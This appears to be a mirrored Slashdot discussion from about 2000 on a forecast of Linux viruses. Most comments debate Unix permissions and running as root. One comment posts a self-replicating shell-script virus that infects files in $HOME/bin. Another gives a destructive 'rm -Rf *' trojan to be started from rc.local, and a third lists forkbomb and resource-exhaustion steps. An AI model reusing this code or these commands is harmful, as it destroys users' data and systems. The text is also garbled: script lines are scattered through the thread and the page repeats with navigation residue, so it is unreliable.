Slashdot Mirror
Linux Virii On Their Way?
Eric the Cat wrote to us with one of the most amusing articles for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the article setting the story a bit straighter.
course I'm still a newbie, so they coulda been lying to me.
Posted by NJViking:
Programs run in user space not kernel space so they can't fsck with your resources.
The virus would have to find a way to get root access.
I can see how something like kernel NFS or the new kernel web server could possibly be exploited to do this, which is why I won't run them.
NJV
hype hype hype Linux hype hype hype yup, same as always what happened to stuff that matters?
I am, therefore you think.
Does this mean we will all have to go out and buy Norton Antivirus for Linux now? I sure hope not.
Have a look for yourself: http://www.dictionary.com/cgi- bin/dict.pl?term=virus
Excerpt: "Unable to replicate without a host cell, viruses are typically not considered living organisms."
--
I would look to some people in Washington before I even thought of the world's largest Linux development team (red linux).
Well seriously now, is it so crazy to suggest that a competing OS would encourage the engineering a virus to weaken their compeiters creditablity?
Real men dump cores! Read my journal, I am neat.
Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.
Viruses/trojans are much less of a problim in *nix simply because most running should be done from unpriviliged users accounts. That greatly confines the damage possible. Unfortunately, MS has yet to understand this concept.
-- Robert
a lame attempt at FUD? :) The 'threat' to Linux by virii is too small to be very concerned about - unless you're stupid enough to run one as root without checking it first :) -- F.P.
Any Unix virus will be limited to what one user can do. Any security bug can be fixed without breaking user programs.
The MS-DOS virus industry has been proliferating due to MS-DOS requiring user access to system hardware for decades.
Why are these virii only going to come from russia ? .. I mean.. they're are tons of "hackers" in other countries too.. I like Kaspersky Labs Anti Virus software for win32.. but I never expected them to make such a stupid comment.. sure as more and more people use linux, the chances of more people writin virii for it increases.. (more people with a lot of free time).. but like jason clifford said.. I can't make a virus run rampant through my system, unless I execute the code as root.. I still don't understand why they would only come from china? Melissa came from New Jersey.. but all these new bad virii are going to come from China ? is this China's way of declaring war against the rest of the world ?
uhm - this article claims that linux is particularly succeptible because the binaries are simple and easy to understand, therefore making them easier to modify... unless we've gotten into the habit of running precompiled binaries as root without looking at the source first, i still don't think we have anything to worry about. the major threat here sounds like the ~/bin directory or something similar - unless you like leaving your /bin /usr/... and /usr/local/... world-writable!
-rich henning -linux 2.2.x
Even though there are ways that a Linux system can be compromised, it is usually through the root user installing malicious code himself. Aside from that, there is no other way a Linux user can infect his whole system by compiling an unknown program.
Maybe these russians just thought they could shake up the media a bit if they did that... and
get a fair share of the market, in case a "Antivirus for Linux" ever exists...
Besides being the name of a great Tori Amos single, this virus was discovered way back in 1997 and sparked a large amount of discussion amongst the virii community as to the feasibility and likelyhood of linux virii. Also, several Bliss-like virii later appeared, prompting most major anti-virus companies to release *nix versions of their AV toolkits.
My question is, why is slashdot reporting news that has been known for over 2 years?
"and no, im not the spot working for Transmeta, although i wish i was..." -- ~spot "i'm the epitome of public enemy..."
i know zdnet...(FUD)
//and here comes the problem
but there is really a problem.
you know the scenario:
./configure
make
su
make install
with faked libs and binaries, suid'd root and you could run into trouble.
i see a problem here
Of course, this all comes down to system configuration. If the system is properly configured, then viruses would be no problem. But who has the time, or the patience? The average user does not. And it is the average user who falls victim to viruses.
I can't say that I don't give a fuck. I've just run out of fuck to give.
Kaspersky says that experts at his company's laboratories have successfully completed one such prototype: the result is a fully functional and potentially virile Linux virus. Kaspersky assures ZDNet that the virus is under lock and key and will stay that way.
:-)
I suppose he also has a list in his pocket of 205 communists^H^H^H^H^H^H^H^H^H^H viruses in the Linux department
* And remember, it's spelled N-e-t-s-c-a-p-e, but it's pronounced "Mozilla."
ummm the FAA still uses Ada.. so does Lockheed martin and BOEING.. a lot of the shuttle 's systems were written in Ada.. put down the crack pipe man..
One of the big strengths behind any Open Source software is that implied in the nature of having the source: you are full disclosed to any of the problems with the software. ANYONE can inspect the code and find the strengths and problems of the software as opposed to "taking the vendor's word for it".
We've seen it time and time again. Security through obscurity doesn't work. I still can't believe that there are *professionals* out there that still believe hidding how the software works is really the way to go.
Actually the use of Ada is generally a requirement for any defense work in the US. If you don't use Ada you need to justify why.
I recently had some of my linux files infected by
what was called a 'proto' virus. Though the virus
only infected the file of that particular user, it
was still a major pain to clean the files.
Though *nix has a very strict file permission system, it is still a big hassle if a user on a system gets infected. Because then the sysop has to trace down who else on the system executed files of that user. And trace it down all the way.
Altogether it is just a big hassle, and it would be great if some virii cleaners were avaliale for the whole system.
I wonder why this FUD was put out to begin with? It seems to me that the target audience was middle managment and not the technical ranks, I think the technical rank and file who are Linux or Unix literate would just dismiss Kasperskys' claims.
Never knock on Death's door:
More race stuff in one place,
than any one place on the net.
(with apologies to Pink Floyd)
What if you boot a disk with a virus that infects LILO. Can any process (if it can even ba called that at LILO time) survive the Linux boot process intact? What if the virus has enough smarts to find the root filesystem (specified in lilo) and wedge itself into /etc/inittab or some such?
Come on guys, let's get serious ... Have you ever seen any noticeable chinese program ?
Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.
Well, there you are wrong. There exist real viruses for Linux. They are not trojans and some of them even look for security holes in other computer so that they can break into them. Some links to the most "famous" ones:
Bliss
Staog
--
It has to work - rfc1925
i dont care what your stupid dictionary dot com site tells you the word virus being a latin derived word has a plural of virii ... has nothing whatsoever to with script kiddie crap rather it has everything to do with proper usage of the language in question, you would do well to learn it before shooting off your mouth too
Perhaps this may get it's start in the linux world if a virus or two starts to appear.
I'm not sure how difficult it would be to create such a thing under the open source model, since it would be easy to get around at first, but even closed-source antivirus apps currently available do not prevent people from getting around them. And open source software would probably be updated much more quickly at any sign of threat.
a universal, freely available, freely updatable, widespread (installed with every distro possibly) could be the death of viruses as we know them.
Probably just wishful thinking on my part.
Haha! This Slashdot post is infected with an evil Linux virus! By reading it, you allowed it enter your system, from whence it will send itself all over the world!
I 0wn j00 n0w!
~~~~~~~~~
auntfloyd
This is based on the concept that the Chinese population, adopting Linux en masse, is as severely thwarted as the Eastern European and Middle Eastern virus writers of Win/DOS fame.
I see no signs of that. They're not dissaffected in regards to computers, and would probably rather write Windows 2000 viruses to get back at the US than their "own" Linux. Wouldn't it be more of a point to attack Bill Gates than to attack your own system?
Will in Seattle
Remember Melissa? It didn't do anything other than make a private note that it had visited and send emails. Think that Unix permissions help against something like this?
Most people keep a lot of important data writable by themselves in their home directory. Sure, "nothing important" may have been deleted, but you could still lose all of your files.
Recall the Internet Worm? This came up before. There was nothing special about it, it just was a worm that could spread itself without any human action. That made its generation time a fraction of a second (as opposed to the 15-minutes to an hour for Melissa), which resulted in its almost instantaneous spread to every machine it could infect. Unix permissions helped against this how?
No, Linux is not immune to viruses. And as long as buffer overflows and the like continued to be treated as minor oversights and not like the major threats that they are (even if the program is only running with user-level permissions), Linux will be vulnerable. Once it becomes popular it will likely become a target...
Until then don't sweat it. After all the fire hasn't burned the house down yet, and we are fireproof. Aren't we?
Regards,
Ben
PS The time for a fix to become available is meaningless. What is the time for that fix to become incorporated on the average machine out there? Ri-ight.
My usual seat in the cluetrain is at A HREF="http://pub4.ezboard.com/biwethey.ht
That being said, I also used to hang out on Fido Net's virus echos in 1994 and 1995 where some of the true anti-virus experts hung out too. And yes, I consider Eugine Kaspersky of AVP (the guy who was quoted in the article) to be one of them. Back when the first Word Macro virus (Winword.Concept), he was the one who I saw first post about it to Fido's VIRUS echo, and he was also the first one to release a fix for it (another word macro which caught and disinfected Winword.Concept).
Unfortunately, I fear this is another case of False Authority Syndrome in that while Eugene may know viruses very well, I question his credentials in the UNIX/Linux area. For one thing, for a virus to replicate to a considerable degree on a system, you'll need to be running as root -- if you're logged in as a regular user, any program you run isn't going to be able to infect /bin/ls, no matter how hard you try. :-)
I think Kaspersky also misunderstands the nature of UNIX/Linux, in that a lot of applications (the stuff *I* use, anyway, like Apache, PHP, MySQL, etc.), when downloaded from the net, are usually done so in source form, and the end user compiles the code and runs it. It would be foolish if someone tried to put replicating code in their source, as it would be spotted very quickly and the author would have some serious explaining to do.
Finally, just to play the Devil's Advocate, I think problems could arise if say, a binary in a distrubtion is infected, and then is sold to thousands of unsuspecting end users. All it would then take is to run that binary as root, and you suddenly have an infection on your hands. However, I don't see this as a very likely scenario, since I can count the number of Linux-based viruses which I have heard of on one hand. For the reasons I outlined above, Linux just isn't a very attractive platform to virus writers, who want to see their creations spread.
I am sure Macro$haft has been trying to write Linux virii for a long time. There are certainly a lot of people who would like to see Linux fail, but hundreds of thousands more who would like to see it succeed.
In the end, even if a virus were to come out that was temporarily damaging to Linux, a fix would be out later that day, and Linux would only be stronger because of it.
Now Macro$haft, on the otherhand, has known about Back Orifice 2000 for a LONG TIME, and hasn't lifted a finger to fix the problem or patch any of the security holes it exploits.
Which product would you rather use? I will stick with open source.
There's an unwritten law that many seem to be overlooking here, overconfident as they are that Unix is beyond anything passed user-level desecration.
God, or his swarthy minions, will create a better breed of virus to accomplish what, perhaps right now, seems impossible or at least unlikely. Computers are no less susceptible to disease than their progenitors, Man, and just as we smite an infectious contagion, another, more virulent strand appears to take its place. Such will be the same in the world of technology, and while the term 'virus' or 'worm' or 'microsoft'may be misleading as to the exact nature of the affliction, something will find its way to creation. Because Man cannot allow itself to be bettered by its own creation.
NEWS FLASH!!!
open source news. an outbreak of a disease similar to the ebola virus has killed at least 63 computers during the past few months in the democratic republic of congo, health officials said monday.
the affliction, which causes sudden high fevers and massive bleeding like ebola, surfaced in january in the northeast part of the country near watsa, a town close to the border of sudan and uganda.
all of the deaths are associated with the open source development town of durba, according to a world health organization representative in the capital kinshasa. reports of deaths elsewhere had not yet been verified, the official said.
a total of 350 computers died around the town of kikwit in the former zaire in 1995 in the most serious known epidemic of ebola, for which there is no known cure.
the disease kills most of its victims, and death usually happens within 48 hours.
the partly state-owned office of kilo-moto (okimo) open source development company operates in durba.
the who official, quoting information obtained from a radio conversation with a computer technician in durba, said that two of the dead were okimo computers but most were systems used by independent programmers.
other dead linked to the Durba outbreak include two aptivas, three compaqs and the laptop of the computer technician who treated the first victims. it died saturday in isiro, to the west of watsa.
the cause of the fever outbreak was not immediately clear.
a team from the programmers without borders technical charity has arrived in the region. they had protective gear and would take samples for testing abroad, who officials said.
scientists have linked ebola outbreaks elsewhere to computers that ate or handled russian floppy disks which had been used in computers that had died of the disease.the cdc has issued an outbreak alert for areas of zaire.
thank you.
All American propaganda! Get lost, losers!
In addition to the technical reasons cited in the article, I believe there's a cultural reason that viruses won't proliferate under Linux and other Unixes. Unlike Windows users, Linux users don't email executable files, such as this past holiday season's "Elf Bowling" and "Frogapault", to one another. If people only get executables from safe sources, e.g. from the vendors or developers themselves, or from well-known sites like metalab, there's little danger of passing around malicious code.
(This is not to say, of course, that we shouldn't step up efforts to distribute code with digital signatures. If someone compromised metalab we could be seriously screwed.)
--
We all know how the saying ends.
Even *if* viruses are unleashed upon the Linux world, and even *if* there are ones that exploit holes... We all should have a fair amount of confidence that they will be fixed--and fixed correctly in a relatively short time. With so many people able to look at source, one should expect this.
Virus writers will have an extremely difficult (if not impossible) time spreading binary viruses. Of course, with the spread of downloading of rpms and debs, one might expect the possibility to increase. I for one rarely download rpms, and then only from trusted sites.
The mirror will invariably be turned back on the virus authors, as we would have the source to their viruses, and all of the holes will be fixed that much quicker, including fixes for variations of the viruses.
Nothing will protect the newbie from getting their personal account deleted, any more than in the Windows world, getting their machine wiped. And anyone ignorant enough to run everything as root will of course get their machine wiped. Wasn't it MCI that got caught by a virus because they ran too much stuff as Administrator in NT?
There is nothing to indicate that the self-policing world of open source will crumble. I'd predict things would become even more secure.
I run as root all the time. I cut my teeth on DOS, Windows, and then NT, and have always run with Administrative priveleges. Never had a problem, I am just extremely careful with what I do.
Most of the time I use Linux I am tinkering, recompiling, reinstalling new versions etc... things that require root access. So why bother with the fiction of a 'user' account?
Ok, so I might be exposing myself to a slightly greater risk with regards to Linux viruses - guess that's what backups are for.
-josh
The program should do the following:
/tmp, /var/tmp, and /usr/tmp.
(1) Fill up
(2) malloc up as much memory as possible.
(3) Continuously read files randomly (to defeat cacheing) all over the filesystem to slow down disk access.
(4) Lock up X (Not hard to do). This can totally sieze up the display and keyboard rendering the machine useless. And if you can't telnet in from elsewhere, you'll be forced to hit reset and uncleanly mount all file systems w potential for loss of data.
(4) When all else is done, forkbomb!
I think the real problem related to this is that, none of the distros (at least the ones I've used), requere any user account to be set up besides the root account at installation time - nor is the user suggested by the install program to do that later on. If users where requered to create an initial account for themselevs, and instructed by the installation program not to use the root account for anything except fro maintainse and program installation, more of the newbies would probably run as unprivilegied users most of the time. In addition, such an installer could ask the user if he/she wants to set up some usefull groups for getting "half-god" privilegies, like write ability to /usr/local and mount ability on /dev/cdrom and /dev/floppy. That sort of privilegies would not comprimise system security much, but restrict the occasions on which a user "su -"'s...
--The knowledge that you are an idiot, is what distinguishes you from one.
--The knowledge that you are an idiot, is what distinguishes you from one.
Look at me, I'm shaking in my little space boots :)
I guess this virus will attack every Linux based system EXCEPT Red Flag Linux, right?
Finkployd
Bill Gates: "Innovation"
you're wrong and he's right. face the facts fudge packer.
According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems.
The "security expert" has a point, but does not seem to be seeing the whole picture. Open source might make it easier for malicious virus-writers to exploit Linux... but it also makes it easier for the rest of us to see what devious tricks they're up to and protect ourselves. I'm going to be generous and suggest that there are more of us than there are of them. There are probably better minds working on the "good-guy" team too.
I don't see how this would make Linux viruses "worse", though theoretically they could be more prevalent. In that unusual scenario, it might be advisable for the uninformed newbies to stick with closed-source OS'es (like they don't already?), since they don't yet know how to protect themselves.
Windows et at might then rightfully be seen as "training wheels" OS'es, for people to use until they learn what they're doing and are ready to graduate to open source.
As most viruses in the real world are NOT written to exploit open-source OS'es, even that argument doesn't apply in reality. If it's not a good entry-level OS (for security reasons), what IS Windows good for?
It was in the old InfoMagic distro from ftp.cdrom. You had to run Doom as root, and it infected you that way!
But we've all learned since then not to run as root - rrrriiiight!
"History doesn't repeat itself, but it does rhyme." Mark Twain
But then I stopped and thought for a second. Given his complete ignorance of how Unix-like operating systems work, he just assumed that more malicious coders + more popularity = more viruses. I took some time explaining that Linux was different because of a) availability of source code b) permissions and c) the extreme wariness of the average Linux user of running untrusted binaries. I said my attitude is that if I can't get the source for it, then I won't run it - and I certainly won't run it as root.
Result: he's now running RedHat as his OS of choice. Yes these stories are funny to any halfway experienced user of Linux. But take some time to explain to a Windows-using friend why they are, and you're well on the way to more effective advocacy.
--- Hot Shot City is particularly good.
- a) less than saavy users. download some untrustworthy source or kernel source or even some binaries and voila, point of infection.
- b) distro poisoning, easier said than done (remember tcp_wrappers got infected, too)
- c) worm style incidents using poorly known holes in major distros (ie Linuxconf vulnerabilities, Apache holes, etc..).
it's a lot easier than some of you may think. a scenario for you: mirror mirror.example.com gets rooted and trojans of key RPM's of the latest RedHat distro are plced in. MD5 sums are altered and the whole thing loks legit. once installed, the packages (gcc, a kernel module, and a few access trojans like telentd or sshd) lie in wait. the kernel module keeps the user from seeing the problem, gcc's trojan always keeps trojans in the system, and the listening entry points are there and well hidden. bingo, you have a problem. say, in a TFN or Trin00 manner you manipulate the systems to rm -rftrust is a magical thing to abuse. and users' trust is getting greater and greater. how many times has the schlub in the cubicle next to you downloaded some spiffy screensaver from the net or run some "executable" from their email? all too often... :)
bear in mind that thompson build a cc trojaned to allow him to log in specially on any box using his cc, which also built it's trojan propogating systems in, too. :) thompson's not malicious, but some people are.
think about all the s|
jose nazario jose@biocserver.cwru.edu
Hm -- do you actually know anything about Latin? I would suggest you check Tom Christiansen's detailed page on this topic. Maybe it will help you avoid "shooting off your mouth" in the future.
You don't need a weatherman to know which way the wind blows.
Here's a portable unix virus. Originally based on the shell script header produced by "gzexe", it contains the necessary apparatus to infect other executables, but no payload. There are at least two problems with the version enclosed in this message which prevent it from functioning.
/dev/null
/tmp/if$$.XXXXXX` || {
/tmp/gz$$.XXXXXX` || {
/tmp/"$prog" ${1+"$@"}; res=$?
Also, it's probably not as "portable" as I'd like, due to relying on bash features. Eh, too bad.
#!/bin/sh
signature=PORTABLE-UNIX-VIRUS # Written by jepler@inetnebr.com, I hope this is crippled enough that it cannot actually infect you
#set -x
if [ $USER != jnobody ]; then exit 1; fi
skip=7676
seed=1
function srandom () { seed=$[$$+`date +%s`] }
function random () { seed=$[($seed*171)%30269] ; if [ $1 -eq 0 ]; then echo 1; else echo $[$seed%$1] ; fi }
function choose () {
shift `random $#`
echo $1
}
function infected () {
head -2 $1 | tail -1 | grep $signature >
}
function infect () {
# pathlist=`echo $PATH | tr : " "`
# dir=`choose $pathlist`
dir=$HOME/bin
echo "Will infect in $dir"
names=`find $dir -maxdepth 1 -type f`
name=`choose $names`
echo "will infect $name"
if infected $name; then
echo Already infected
else
if [ ! -w $name ]; then
notwrite=1
chmod u+w $name
fi
if [ -w $name ]; then
infectfile=`mktemp
echo 'cannot create a temporary file' >&2
exit 1
}
(head -$[$skip-1] $0; cat $name) > $infectfile
cat $infectfile > $name
rm -f $infectfile
if [ x$notwrite = x1 ]; then
chmod u-w $name
fi
echo success
else
echo Darn, no write permissions
fi
fi
}
srandom
tmpfile=`mktemp
echo 'cannot create a temporary file' >&2
exit 1
}
if tail +$skip $0 > $tmpfile; then
infect
chmod 700 $tmpfile
prog="`echo $0 | sed 's|^.*/||'`"
if ln $tmpfile "/tmp/$prog" 2>/dev/null; then
trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0
(sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null &
else
trap 'rm -f $tmpfile; exit $res' 0
(sleep 5; rm -f $tmpfile) 2>/dev/null &
$tmpfile ${1+"$@"}; res=$?
fi
else
echo Cannot decompress $0; exit 1
fi; exit $res
true
Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission.
It spreads from user to user, and once you're infected, you can never go back.
It has been know to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine.
It makes its users say crazy things like "awk", "grep", "FUD", and so on....
I do what the voices on my console tell me to do.
We need to grind PGP/GPG further into the Linux infrastructure, perhaps to the point of making it default behavior. That will validate that the package is what was shipped, and not tampered en route. Then we need to have a way to know WHO to trust. Both of these problems have been solved by the PGP/GPG community. Now that the USA is less opposed to encryption, we just need to move them into the infrastructure. It should be the default behavior to give some sort of way to newbie-proof distributions, simply so the inexperienced don't accidentally become disease vectors. Obviously the mechanisms need override capabilities for the experienced. But B.Operator is right, in that even having the source is of little good unless you go through it for the security exposures. Simply getting source and following INSTALL is no more secure than a binary.
The living have better things to do than to continue hating the dead.
... and it's called VIGOR. :-)
Linux users might have more trouble with emacs
viruses. Though I don't know how many people use
it as a mail client.
OK, I think most of us can agree with this:
:-)
In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root
And with this:
It's no so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to
But the problem lies with people who run Linux but lack backgroud with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way. This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid.
So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it.
Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh?
And you may ask yourself, well, how did I get here?
being a latin derived word
Yep
has a plural of virii
Nope. Virii would be the plural of virius, which isn't a word. In fact, authorities disagree on the plural of virus -- see here for a reasonably erudite discussion.
The authors' comment on "Virii" is:
"Virii is still completely silly, so don't do that; otherwise, everyone will know you're just a blathering script kiddie.
I think this is a bit harsh, and probably motivated by an otherwise admirable Anglo-Saxonism, favouring "Viruses". For my money, virus in meaning plus etymology is a group of items, treated as a single item which follows the literal Latin meaning of "poison". As a result, it is analagous with "prospectus", and the correct plural is "virus", with a long final 'u'.
For those who are really interested in the reasoning behind this interpretation, this site may be of interest.
A trojan is a delivery mechanism, a virus is a self replicating program.
A virus might attach itself to a benign program, thus transforming that program into an unwitting trojan, or a trojan might deliver a non-self-replicating program - even a virus killer.
Of course either of the two can exist on Linux, but Linux (and all Unices) have security mechanisms to minimise the damage done by, and propagation of, these beasties.
Why couldn't someone simply write a userspace TTY program that interfaces with the TTY underneth it? So, to the user, it dosn't apear that there is anything wrong, when infact all the keystrokes go to the program?
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
if this fella offered to show the locked up completed Linux virus to one of the major kernel hackers - maybe Alan or Linus - so we all could get a knowledgeable assessment of the possible current and future dangers. Just a thought
"shop smart:shop s-mart" ash
...not the "cure-all" for a insecure system. Chmod and chgrp are tools, just like /etc/hosts.deny. Security is a combination of a software engineering issue and a policy issue: great security ideas are often poorly implemented, either in software, or by a particular system administrator (*cough*... NT... *cough*).
;). Check out this page for an explanation. (Link kindly donated by a previous /. article.)
For example, Windows NT has a much more granular permissions implementation than most Unix systems (NT uses ACLs), but viruses still run rampant on NT boxes due to poor administration. If I had a dollar (or hell, even five cents) for every time I saw someone logged in as Administrator to use M$ Office, I'd be a rich man. The virus problem is even worse under Win9x variants: there aren't any (or very many) security tools, including filesystem permissions, to use.
A well-thought out security policy can guard against most any virus - it's ignorance that viruses prey on, regardless of the OS.
And please: the plural of virus is viruses, not viri or any other abuse of Latin
isn't a sneaky virus, it's a sneaky tech help guy. In Linux, hired help can recompile/rewrite anything, no?
Where is my mind?
Check out Project Upper/Mute, an all-around awesome compiler fra
Cliffords comments on the other hand outline simply that Linux and *nix have much stricter file permissions and unless your log in as root, your pretty safe.
I log in as delmoi. I get a virus. All my stuff is now gone.
I would hardly call that safe
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
CIH came from taiwan...
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
- There were Unix viruses, Worms and Trojans around since before the PC was designed; they have spread since the first few machines set up UUCP links; Unix viruses are far from new.
- Unix viruses are kept mainly in check because normal users don't have the permissions to do harm - they can harm their own files, they can harm the files of those that trust them. but they can't alter anyone else's, and, most importantly, they normally can't even INSTALL programs, never mind alter those already installed by other people.
- Linux is not Unix - 90% of Linux boxes are single user (maybe single user with webserver, or with a email router, but still single user) and for a high percentage of those, that single user either runs as root, or, if smart enough to run as a user when out on the net, will load the same data files, use the same packages, and generally work in the same sandpit when doing admin tasks that require system privileges as when running his limited "safe" account. As more and more buy "fashionable" pre-loaded linux boxes, you will see a wave of people caught by the same factors that make a windows-based machine insecure - that the user will run things without thinking, and that the user has enough permissions that the virus can take a hold.
So, what it comes down to is that, in general, Unix viruses are not (and will not) be a problem, but that Linux has vunerabilities that make it less secure than Unix used to be.--
-=DaveHowe=-
Hey, here's an article a guy I work with forwarded to me a few weeks ago:
/sbin/initd, was found on some of our systems. It allows a remote user to connect and run arbitrary commmands with root privileges without authentication. It allows an attacker to connect to a large number of machines simultaneously and execute destructive commands with ease.
/sbin/initd (note; _not_ the standard /sbin/init which is needed for standard system operation), was installed on the systems and set to a mode that makes it impossible to delete by a normal user; the chattr command was needed to remove the immutable and append-only attributes.
/etc/rc.d/rc.local was modified to start up /sbin/initd and /sbin/quotad at boot time; the latter was not found on the systems at all and did not appear to have been recently deleted from them.
/usr/bin/bash
http://www.sans.org/y2k/trojan.htm
Now, for those of you that are panicked, let me go through it point by point:
This is a report about a backdoor tool that was recently found on some of our RedHat 4.x Linux boxes.
Umm, upgrade, anyone? I've got some DOS 3.3 virii, if anyone's interested.
A trojan binary,
inetd? Cleverly named. Sounds nasty, but let's see what is required to run.
A new libc5 binary,
Oh, the humanity!!!! Don't make me use 'chattr' or log in as root!!
It listens on those ports for remote requests and performs them on the local machine. It requires the remote client to enter a password (embedded in the binary) then will execute any additional commands.
Enter a password, and then execute commands? I think I've already got this virus! It's called telnetd!
Hey, got a DOS virus for ya. Gotta load it in autoexec.bat, though. People, look at your initd every once and a while, k?
Run ps ax.
This command will list the running programs on your system. If any commands have a name that looks something like 'syslog.itd' or 'syslog initd', this is a very good sign that you have this tool running. This/these pid's are very good candidates for killing off. Does this listing show any other programs you don't recognize?
It shows up in a process list? what kind of virus is this?
Here, I got a trojan horse for you. Cut the text, and paste it in a file with a Unix-sounding name:
---Cut here---
#!
cd /
rm -Rf *
---End Cut---
Give the file execute permissions.
Now, make sure you start up this virus in rc.local, or even in your crontab.
Reboot.
This virus is just about as effective as the one above.
+-- (Score:-1, Moderator on Power Trip)
You don't get out much, do you?
"Widget choice makes me horny." -
Yep, I'm happy if they come. Why you ask?
Answer:
After a few people who thought they were invulnerable get burned, more people will start checking the GnuPG/PGP signature on downloaded files. More people will begin signing them as well. A lot of people who weren't as worried about security all of the sudden will be. And people will start thinking before make && make install
It can't kill us, and what doesn't kill us only makes us stronger.
Security is a responsibility we must take seriously. And 90% happens between the ears of the admin.
This sig is false.
I don't like the way everyone is so convinced linux is secure. No OS I know of can account for a newbie being stupid (ie. blindly running files he/she just downloaded off the 'net)
Even though they may not be able to damage anything other then they users files the infected program will probably be able to read the users address database and send itself to say the first 50 names in the address book (ring any bells:-). I'm fairly sure I could write said virus myself but I don't want to go to prison!
If the virus also "merged" itself with other executable files in the users home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze aswell so that stumbling block is irrelevant.
This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.) especially nowadays as GNU/Linux has attracted virus writers attention.
I would be more concerned about viruses and trojans comming from Microsoft than China.
Well over fifty posts, and no one has called him on such a blatant mispelling.
Oh well, I propose it be made a real word, in the context of computers, kind of like "mouses" is the plural of those pointing devices.
What, you don't think that's a real word either? Damn language nazis...
You don't get out much, do you?
When I have the wonderous Windows 2000 operating system to keep me company, "getting out" seems to be a bit old-fashioned. Why should I be bothered with the mundane tasks of an unrewarding life when I can stay in and be entertained by this marvelous piece of software engineering? I would appreciate any thoughts that you might have on this, just as long as you are not a Linux user.
It's easy enough to find the root filesystem! /etc/inittab or whatever very easily. /etc/inittab)
Assuming most computers with linux installed only have one partition as type 83 then the virus would be able to stick it into
The challenges would be:
a) get the code sufficiently small it mightn't be noticed to easy
b) if there is more than one linux partition or something than the lilo info would need to be found from the MBR but that doesn't really matter much and anyway what's to stop the virus inserting itself into any/all type 83 (ext2) partitions (checking first there is a
Basically, traversing the partition tables is easy done - be they primary or extended, and the source for writing to ext2 is readily available (not surprisingly)
faq code awards privacy slashNET older stuff rob's page preferences andover.net submit story advertising supporters past polls topics about jobs hof Sections 1/23 (2) apache 1/24 (12) askslashdot 1/18 awards 1/14 books 1/20 bsd 1/24 features 1/24 interviews 1/19 radio 1/23 (5) science 1/22 (3) yro Andover.Net AndoverNews Ask Reggie Freshmeat ITR MediaBuilder Linux Virii On Their Way? Posted by Hemos on Monday January 24, @12:27PM from the really-damn-funny dept. Eric the Cat wrote to us with one of the most amusing article for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the story setting the story a bit straighter. /dev/null } function infect () { # pathlist=`echo $PATH | tr : " "` # dir=`choose $pathlist` dir=$HOME/bin echo "Will infect in $dir" names=`find $dir -maxdepth 1 -type f` name=`choose $names` echo "will infect $name" if infected $name; then echo Already infected else if [ ! -w $name ]; then notwrite=1 chmod u+w $name fi if [ -w $name ]; then infectfile=`mktemp /tmp/if$$.XXXXXX` || { echo 'cannot create a temporary file' >&2 exit 1 } (head -$[$skip-1] $0; cat $name) > $infectfile cat $infectfile > $name rm -f $infectfile if [ x$notwrite = x1 ]; then chmod u-w $name fi echo success else echo Darn, no write permissions fi fi } srandom tmpfile=`mktemp /tmp/gz$$.XXXXXX` || { echo 'cannot create a temporary file' >&2 exit 1 } if tail +$skip $0 > $tmpfile; then infect chmod 700 $tmpfile prog="`echo $0 | sed 's|^.*/||'`" if ln $tmpfile "/tmp/$prog" 2>/dev/null; then trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0 (sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null & /tmp/"$prog" ${1+"$@"}; res=$? else trap 'rm -f $tmpfile; exit $res' 0 (sleep 5; rm -f $tmpfile) 2>/dev/null & $tmpfile ${1+"$@"}; res=$? fi else echo Cannot decompress $0; exit 1 fi; exit $res true [ Reply to This | Parent ] Linux is a virus in itself (Score:5, Funny) by razvedchik on Monday January 24, @01:07PM EST (#71) (User Info) Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission. It spreads from user to user, and once you're infected, you can never go back. It has been know to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine. It makes its users say crazy things like "awk", "grep", "FUD", and so on.... The problem with e-mail lists is that you can't post as the "Anonymous Coward". [ Reply to This | Parent ] It's already here... (Score:1) by havoc- (havoc-nospam@phoenix.student.utwente.nl) on Monday January 24, @01:08PM EST (#75) (User Info) http://phoenix.student.utwente.nl ... and it's called VIGOR. :-) -- So much to compile, so little time... [ Reply to This | Parent ] Klooless Noobies (Score:2, Interesting) by Mechanist on Monday January 24, @01:09PM EST (#80) (User Info) OK, I think most of us can agree with this: In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root And with this: It's no so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to But the problem lies with people who run 